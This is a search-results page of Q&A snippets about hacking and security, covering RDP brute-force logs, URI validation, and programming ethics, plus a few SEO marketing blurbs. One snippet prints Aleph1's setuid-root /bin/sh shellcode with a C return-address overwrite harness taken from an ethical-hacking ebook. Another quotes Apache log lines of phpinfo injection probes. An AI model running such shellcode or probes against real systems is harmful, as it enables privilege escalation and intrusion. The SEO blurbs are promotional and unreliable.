Search Results

Search found 707 results on 29 pages for 'ethical hacking'.


  • Software Life-cycle of Hacking

    - by David Kaczynski
    At my local university, there is a small student computing club of about 20 students. The club has several small teams with specific areas of focus, such as mobile development, robotics, game development, and hacking / security. I am introducing some basic agile development concepts to a couple of the teams, such as user stories, estimating complexity of tasks, and continuous integration for version control and automated builds/testing. I am familiar with some basic development life-cycles, such as waterfall, spiral, RUP, agile, etc., but I am wondering if there is such a thing as a software development life-cycle for hacking / breaching security. Surely, hackers are writing computer code, but what is the life-cycle of that code? I don't think that they would be too concerned with maintenance, as once the breach has been found and patched, the code that exploited that breach is useless. I imagine the life-cycle would be something like:

      - Find gap in security
      - Exploit gap in security
      - Procure payload
      - Utilize payload

    I propose the following questions: What kind of formal definitions (if any) are there for the development life-cycle of software when the purpose of the product is to breach security?


  • Are these hacking attempts or something less sinister?

    - by Darkcat Studios
    I just had a look through our web server error logs, and Terminal Services is reporting: "Remote session from client name a exceeded the maximum allowed failed logon attempts. The session was forcibly terminated." Hundreds of times, every 10.5 seconds or so for a period of about 5-10 minutes, once at 2pm yesterday and once again at about 1am this morning. We CURRENTLY have RDP open to the outside, as I am just completing the setup and now and then I/others need to jump on from an outside office/location (VPN isn't an option). As these are so regular, am I right in assuming that they may be the result of some sort of dictionary attack? Or could something like an internal admin's hung session cause such a mass of events? (Win Server 2008 R2)


  • (200 ok) ACCEPTED - Is this a hacking attempt?

    - by Byran
    I assume this is some type of hacking attempt. I've tried to Google it, but all I get are sites that look like they have been exploited already. I'm seeing requests to one of my pages that look like this:

      /listMessages.asp?page=8&catid=5+%28200+ok%29+ACCEPTED

    The '(200 ok) ACCEPTED' is what is odd. But it does not appear to do anything. I'm running on IIS 5 and ASP 3.0. Is this "hack" meant for some other type of web server?


  • Hacking prevention, forensics, auditing and counter measures.

    - by tmow
    Recently (but it is also a recurrent question) we saw 3 interesting threads about hacking and security:

      - My server's been hacked EMERGENCY.
      - Finding how a hacked server was hacked
      - File permissions question

    The last one isn't directly related, but it highlights how easy it is to mess up web server administration. As there are several things that can be done before something bad happens, I'd like to have your suggestions in terms of good practices to limit the side effects of an attack and how to react in the sad case that it happens. It's not just a matter of securing the server and the code but also of auditing, logging and countermeasures. Do you have any good practices list, or do you prefer to rely on software or on experts that continuously analyze your web server(s) (or nothing at all)? If yes, can you share your list and your ideas/opinions?


  • should i bother to block these- rather lame attempt at hacking my server

    - by The Journeyman geek
    I'm running a LAMP stack, with no phpmyadmin (yes) installed. While poking through my Apache server logs I noticed things like:

      74.208.75.29 - - [16/Mar/2010:02:53:45 +0800] "POST http://74.208.75.29:6667/ HTTP/1.0" 404 481 "-" "-"
      74.208.75.29 - - [16/Mar/2010:02:53:45 +0800] "CONNECT 74.208.75.29:6667 HTTP/1.0" 405 547 "-" "-"
      66.184.178.58 - - [16/Mar/2010:13:27:59 +0800] "GET / HTTP/1.1" 200 1170 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
      200.78.247.148 - - [16/Mar/2010:15:26:05 +0800] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 506 "-" "-"
      206.47.160.224 - - [16/Mar/2010:17:27:57 +0800] "GET / HTTP/1.1" 200 1170 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
      190.220.14.195 - - [17/Mar/2010:01:28:02 +0800] "GET //phpmyadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 480 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
      190.220.14.195 - - [17/Mar/2010:01:28:03 +0800] "GET //pma/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 476 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
      190.220.14.195 - - [17/Mar/2010:01:28:04 +0800] "GET //admin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 478 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
      190.220.14.195 - - [17/Mar/2010:01:28:05 +0800] "GET //dbadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 479 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
      190.220.14.195 - - [17/Mar/2010:01:28:05 +0800] "GET //mysql/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 479 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
      190.220.14.195 - - [17/Mar/2010:01:28:06 +0800] "GET //php-my-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 482 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

    What exactly is happening? Is it a really lame attempt at hacking in? Should I bother blocking the IP addresses these are from, or just leave it?


  • Is it worth hiring a hacker to perform some penetration testing on my servers ?

    - by Brann
    I'm working in a small IT company with paranoid clients, so security has always been an important consideration to us; in the past, we've already mandated two penetration tests from independent companies specialized in this area (Dionach and GSS). We've also run some automated penetration tests using Nessus. Those two auditors were given a lot of insider information, and found almost nothing* ... While it feels comfortable to think our system is perfectly sure (and it was surely comfortable to show those reports to our clients when they performed their due diligence work), I've got a hard time believing that we've achieved a perfectly sure system, especially considering that we have no security specialist in our company (security has always been a concern, and we're completely paranoid, which helps, but that's as far as it goes!). If hackers can hack into companies that probably employ at least a few people whose sole task is to ensure their data stays private, surely they could hack into our small business, right? Does someone have any experience in hiring an "ethical hacker"? How to find one? How much would it cost?

    *The only recommendation they made us was to upgrade our remote desktop protocols on two Windows servers, which they were able to access because we gave them the correct non-standard port and whitelisted their IP.


  • I have this code .... Ethical Hacking

    - by kmitnick
    Hello folks, I am following this eBook about Ethical Hacking, and I reached the Linux Exploit chapter. This is the code, with Aleph1's code:

      //shellcode.c
      char shellcode[] = //setuid(0) & Aleph1's famous shellcode, see ref.
      "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" //setuid(0) first
      "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
      "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
      "\x80\xe8\xdc\xff\xff\xff/bin/sh";
      int main() { //main function
          int *ret; //ret pointer for manipulating saved return.
          ret = (int *)&ret + 2; //setret to point to the saved return
                                 //value on the stack.
          (*ret) = (int)shellcode; //change the saved return value to the
                                   //address of the shellcode, so it executes.
      }

    I give this the super user privileges, with chmod u+s shellcode as a super user, then go back to normal user with su - normal_user, but when I run ./shellcode I should be a root user but instead I am still normal_user. So any help?? BTW, I am working on BT4-Final, I turned off the ASLR, and am running BT4 in VMWare...


  • What ethical problems realistically arise in programming?

    - by Fishtoaster
    When I co-oped during college, I had to fill out an evaluation of the co-op afterwards. One metric I always had to rate was how much the company required me to "Make ethical decisions related to your profession." This always seemed kinda silly - I mean, my first co-op was writing Java apps to manage industrial radios. There wasn't much moral ambiguity going on. Anyway, I'm wondering what sort of ethical dilemmas one might actually encounter in software development.

    Edit: "It should be noted that no ethically-trained software engineer would ever consent to write a DestroyBaghdad procedure. Basic professional ethics would require him to write a DestroyCity procedure, to which Baghdad could be given as a parameter." - Nathaniel Borenstein


  • Handle URI hacking gracefully in ASP.NET

    - by asbjornu
    I've written an application that handles most exceptions gracefully, with the page's design intact and a pretty error message. My application catches them all in the Page_Error event and there adds the exception to HttpContext.Current.Context.Items and then does a Server.Transfer to an Error.aspx page. I find this to be the only viable solution in ASP.NET as there seems to be no other way to do it in a centralized and generic manner. I also handle the Application_Error and there I do some inspection on the exception that occurred to find out if I can handle it gracefully or not. Exceptions I've found I can handle gracefully are those that are thrown after someone hacks the URI to contain characters the .NET framework considers dangerous or basically just illegal at the file system level. Such URIs can look like e.g.:

      http://exmample.com/"illegal"
      http://example.com/illegal"/
      http://example.com/illegal /

    (Notice the space before the slash at the end of the last URI.) I'd like these URIs to respond with a "404 Not Found" and a friendly message as well as not causing any error report to be sent, to avoid DDOS attack vectors and such. I have, however, not found an elegant way to catch these types of errors. What I do now is inspect the exception.TargetSite.Name property, and if it's equal to CheckInvalidPathChars, ValidatePath or CheckSuspiciousPhysicalPath, I consider it a "path validation exception" and respond with a 404. This seems like a hack, though. First, the list of method names is probably not complete in any way and second, there's the possibility that these method names get replaced or renamed down the line, which will cause my code to break. Does anyone have an idea how I can handle this in a less hard-coded and much more future-proof way? PS: I'm using System.Web.Routing in my application to have clean and sensible URIs, if that is of any importance to any given solution.


  • Attributes of an Ethical Programmer?

    - by ahmed
    Software that we write has ramifications in the real world. If not, it wouldn't be very useful. Thus, it has the potential to sweep across the world faster than a deadly manmade virus or to affect society every bit as much as genetic manipulation. Maybe we can't see how right now, but in the future our code will have ever-greater potential for harm or good. Of course, there's the issue of hacking. That's clearly a crime. Or is it that clear? Isn't hacking acceptable for our government in the event of national security? What about for other governments? Cases of life-and-death emergency? Tracking down deadbeat parents? Screening the genetic profile of job candidates? Where is the line drawn? Who decides? Do programmers have responsibility for how their code is used? What if a programmer writes code to pry into confidential information or copy-protected material? Does he bear responsibility along with the person who used the program? What about a programmer who knowingly or unknowingly writes code to "fix the books?" Should he be liable?


  • Hacking your own application

    - by instigator
    I am a web developer who is very conscious of security and I try to make my web applications as secure as possible. However, I have started writing my own Windows applications in C#, and when it comes to testing the security of my C# application, I am really only a novice. Just wondering if anyone has any good tutorials/readmes on how to hack your own Windows application and on writing secure code.


  • piece of php code for prevent hacking.

    - by artmania
    Hi friends, I have a PHP file at my site, and I connect to the db, get some records and list them in the same file.

      mysql_connect("localhost", "blabla", "blabla") or die(mysql_error());
      mysql_select_db("blabla") or die(mysql_error());
      $blabla1 = mysql_query("SELECT * FROM gallery WHERE id_cat=1");
      $blabla2 = mysql_query("SELECT * FROM gallery WHERE id_cat=2");
      $blabla3 = mysql_query("SELECT * FROM gallery WHERE id_cat=3");

    So, is there anything I need to do for security? :/ Like SQL injection or anything else. There is nothing going to the URL; it is just www.blabla.com/gallery.php. Appreciate any advice!!! Thanks a lot!


  • Amateur developers take up hacking with the proliferation of "all-…" hacking kits

    Updated 29/04/10. Amateur developers take up hacking with the proliferation of "all-in-one" hacking kits, but they remain very professional. "Do-it-yourself" hacking kits (in French, « faites-le vous-même ») are reportedly spreading at high speed. These "all-in-one" solutions do make it easier to create and use malware (a finding also made by Microsoft in its semi-annual security report - read above). Their relatively low prices did the rest in making them accessible to all malicious developers, including the least skilled. In its study, M8...


  • Mythbusters- Programming/hacking myths [closed]

    - by stephen776
    Hey guys. I am a big fan of the Discovery show Mythbusters, as I'm sure some of you are as well. I have always wanted them to do an episode on programming/hacking. They get a lot of their show ideas from fans, so I thought we could compile a list of possible myths to bust. Let's hear your ideas! (Sorry if this is not appropriate, close if necessary.) Edit: I am not necessarily looking for subjective "This is what I want to see" answers. I am talking more along the lines of interesting computer/programming/hacking stories that would appeal to a general audience. I do not expect them to do a show on "What's faster, i++ or i + 1".


  • Ethical White Hat SEO Services

    SEO is such a vast amalgamation of features that professionals regularly working on this process have found loopholes through which results can be manipulated. These unfair practices and malpractices have damaged the credibility of the process and have also given critics and SEO bashers a chance to level the most outrageous and preposterous allegations against it and its efficacy.


  • Website Design and Ethical SEO

    There are a host of website design and SEO companies in Chicago. SEO consists of consultation services, tailor-made changes to the owner's website, analysis of keywords and market research, website hosting on high-speed servers, on-page and off-page SEO, email marketing, a matching blog, use of Webmaster 2.0, a Google Analytics setup that distinguishes which of the client's ads are most effective and disposes of the rest, thus cutting expenses, and SEM (Search Engine Marketing) such as pay-per-click management and usage of Google AdWords. All of this is part of website design in Chicago.


  • 7 Ethical SEO Strategies

    Back when the concept of the internet was still new, many of its users abused it. They made millions of dollars just scamming people out of their precious savings. They posted things that others had made and made themselves look legitimate.

